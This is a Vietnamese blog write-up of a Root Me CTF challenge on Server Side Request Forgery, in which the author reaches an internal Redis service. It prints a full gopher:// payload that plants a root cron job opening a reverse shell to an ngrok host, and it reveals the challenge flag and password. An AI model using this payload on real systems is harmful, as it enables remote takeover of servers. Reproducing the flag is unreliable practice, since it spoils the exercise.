[Write-Up] Root me – Server Side Request Forgery

Posted byNhat TruongPosted inCTF
  • Vì biết lỗ hổng là SSRF nên theo thói quen thì mình thử nhập file:///etc/passwd để xem sao thì bùm
  • Xác định được không hề có filter gì ở đây, nhưng vấn đề đặt ra là làm sao để leo thang đặc quyền lên quyền root mà lấy flag được nhỉ. Thực sự dạng bài này mình chưa gặp phải bao giờ nên mình đã loay hoay một khoảng thời gian khá lâu để search gg tìm kiếm thứ gì đó. Cuối cùng mình đã tìm thấy bài viết này.
  • Vì khá lười test hết các cổng nên mình đã thử ngay cổng 6379 (redis) để cầu may không ngờ được luôn
  • Vì phản hồi khá nhanh nên mình chắc chắn cổng này đang mở. Sau đó mình sử dụng tool gopherus để tạo payload, à còn sử dụng ngrok để public localhost
  • Gửi nó đến server và đợi kết quả, nhưng không hiểu sao server của mình hiện mỗi connect như này mà không rce được luôn @@
  • Mình đã thử các cách khác nhau nhưng mà đều không được :((
  • Sau một hồi mày mò mãi không được và nhờ sự giúp đỡ của người khác thì mình đã hiểu ra vấn đề, đó là do mình đã nhầm lần giữa port của localhost và port của ngrok, tức là payload được tạo ra bởi gopherus nó tự động gán port là 1234 và mình đã tưởng là phải tạo localhost với cổng 1234. Nhưng không phải thế, mình phải sửa lại payload theo đúng port của ngrok
  • Đây là payload do tool tạo ra
  • Sửa lại payload theo port của ngrok, ở đây port ngrok của mình đang là 17980:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2469%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/0.tcp.ngrok.io/17980%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2416%0D%0A/var/spool/cron/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
  • local host thì để port bao nhiêu cũng được
  • Nhập vào và được kết quả
  • flag : SSRF_PwNiNg_v1@GoPh3r_1s$o_c00l!
  • passwd: 186ab848532c0bc0e234fdd7059a2222

Tham khảo:

  • Em Quốc Anh

Published by Nhat Truong

Hi

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: